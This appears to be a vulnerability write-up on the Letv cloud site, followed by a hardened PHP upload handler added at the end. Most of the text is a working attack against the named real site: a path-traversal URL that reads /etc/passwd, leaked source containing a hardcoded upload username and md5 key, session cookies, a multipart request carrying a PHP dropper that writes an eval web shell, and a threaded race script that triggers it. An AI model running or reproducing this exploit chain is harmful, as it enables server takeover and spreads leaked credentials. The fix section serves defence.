Letv cloud main site getshell
The Leeco cloud main site is open to getshell because of a design flaw in its code.
http://www.letvcloud.com/api/docdownload?filename=../../../../../../../../../../../etc/passwd allows arbitrary files to be downloaded.
Use it to read the file www/Home/Lib/Action/VideoAction.class.php
Starting from line 1
    } else { // only supports jpeg upload
        $max_file_size = 2000000; // The maximum size of the uploaded file is 2 MB. The unit is bytes
        if ($file['type'] != 'image/jpeg' && $file['type'] != 'image/pjpeg') {
            $error_message = "<font color='red'>images can only be in jpg format!</font>";
            echo '<script>(function(){parent.document.getElementById("' . $txtid . '").innerHTML="' . $error_message . '";})();</script>';
            exit;
        }
        if ($max_file_size < $file["size"]) {
            $error_message = "<font color='red'>the maximum file size should not exceed 2 MB!</font>";
            echo '<script>(function(){parent.document.getElementById("' . $txtid . '").innerHTML="' . $error_message . '";})();</script>';
            exit;
        }
    }
    $dest_folder = "Public/img/";
    if (!file_exists($dest_folder)) {
        mkdir($dest_folder);
    }
    $pinfo = pathinfo($file['name']);
    $newfilename = md5(time()) . "." . $pinfo['extension'];
    $destination = $dest_folder . $newfilename;
    if (move_uploaded_file($filename, $destination)) {
        $url = 'http://upload.letvcdn.com:8000/single_upload_tool.php';
        $data = array(
            "isphone" => "1",
            "username" => "isleju",
            "md5str" => "26f6c33c801913158424f7d3fbd6d0c3",
            "single_upload_submit" => "",
            "single_upload_file" => "@" . realpath($destination), // change the file name to
            "single_upload_submit" => "OK"
        );
        $urldatajson = uploadByCURL($data, $url);
        $urldata = json_decode($urldatajson, true);
        unlink($destination);
The uploaded file is unlinked at the end. However, because the file is first uploaded to another server in between, a time window is left during which the file still exists under Public/img/.
Using this time window, we can getshell.
First, the request packet:
    POST /video/imgupload HTTP/1.1
    Host: www.letvcloud.com
    Proxy-Connection: keep-alive
    Content-Length: 450
    Cache-Control: max-age=0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Origin: http://www.letvcloud.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGFLdcAPyYpQq380J
    Referer: http://www.letvcloud.com/video/edit/videoid/8682339
    Accept-Encoding: gzip,deflate
    Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
    Cookie: LETVCLOUDID=705140aba5a3dc13e1222394352ade2b; Hm_lvt_984e73b4d6ff5ece34ec3da984ece290=1418609297; Hm_lpvt_984e73b4d6ff5ece34ec3da984ece290=1418631122

    ------WebKitFormBoundaryGFLdcAPyYpQq380J
    Content-Disposition: form-data; name="txtid"

    load_message
    ------WebKitFormBoundaryGFLdcAPyYpQq380J
    Content-Disposition: form-data; name="headImg"

    headImg
    ------WebKitFormBoundaryGFLdcAPyYpQq380J
    Content-Disposition: form-data; name="upfile"; filename="test§1§.php"
    Content-Type: image/jpeg

    <?php fputs(fopen('f.php','w'),'<?php eval($_POST[f])?>');?>
    ------WebKitFormBoundaryGFLdcAPyYpQq380J--
With 20 threads continuously sending this packet, PHP files are continuously created and uploaded to the other server.
Then use the following script:
    <?php
    // The server names the file md5(time()), so the URL follows from the current second.
    $url = "http://www.letvcloud.com/Public/img/" . md5(time()) . ".php";
    echo $url;
    file_get_contents($url);
    ?>
Run it with a higher number of threads.
If the uploaded PHP file is requested before it is deleted, it executes and writes a new PHP file, resulting in getshell.
Solution:
Filter
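
One way to implement the filtering named in the solution, as an added example (not Letv's code): it replaces the storage step of the excerpt so that the type is decided from the file's bytes, the extension and name are chosen by the server, and the temporary copy never sits in a web-served directory. UPLOAD_TMP_DIR and storeJpegUpload() are hypothetical names; uploadByCURL(), $data and $url are the excerpt's own and are not defined here.

```php
<?php
// Added example: hardened replacement for the upload step in the excerpt.
// Assumption: UPLOAD_TMP_DIR is a hypothetical directory outside the web root.
const UPLOAD_TMP_DIR = '/var/lib/app/upload-tmp'; // hypothetical, not web-served
const MAX_FILE_SIZE  = 2000000;                   // same 2 MB limit as the original

function storeJpegUpload(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_FILE_SIZE) {
        throw new RuntimeException('file larger than 2 MB');
    }

    // Decide the type from the bytes, not from the client-sent Content-Type
    // ($file['type']) that the original check relied on.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== 'image/jpeg') {
        throw new RuntimeException('only JPEG images are accepted');
    }
    // The file must also parse as a JPEG image.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[2] !== IMAGETYPE_JPEG) {
        throw new RuntimeException('not a valid JPEG');
    }

    // Never reuse the client extension ($pinfo['extension']); the server picks
    // ".jpg" and an unguessable name instead of md5(time()).
    $destination = UPLOAD_TMP_DIR . '/' . bin2hex(random_bytes(16)) . '.jpg';
    if (!move_uploaded_file($file['tmp_name'], $destination)) {
        throw new RuntimeException('could not store upload');
    }
    return $destination;
}

// Usage in the action: forward the stored file, then always remove it.
// $destination = storeJpegUpload($_FILES['upfile']);
// try { $urldatajson = uploadByCURL($data, $url); } finally { unlink($destination); }
```

Even if the relay to the other server is slow, the temporary copy is never reachable by URL and never has a .php extension, so the window before unlink() cannot be used to execute it.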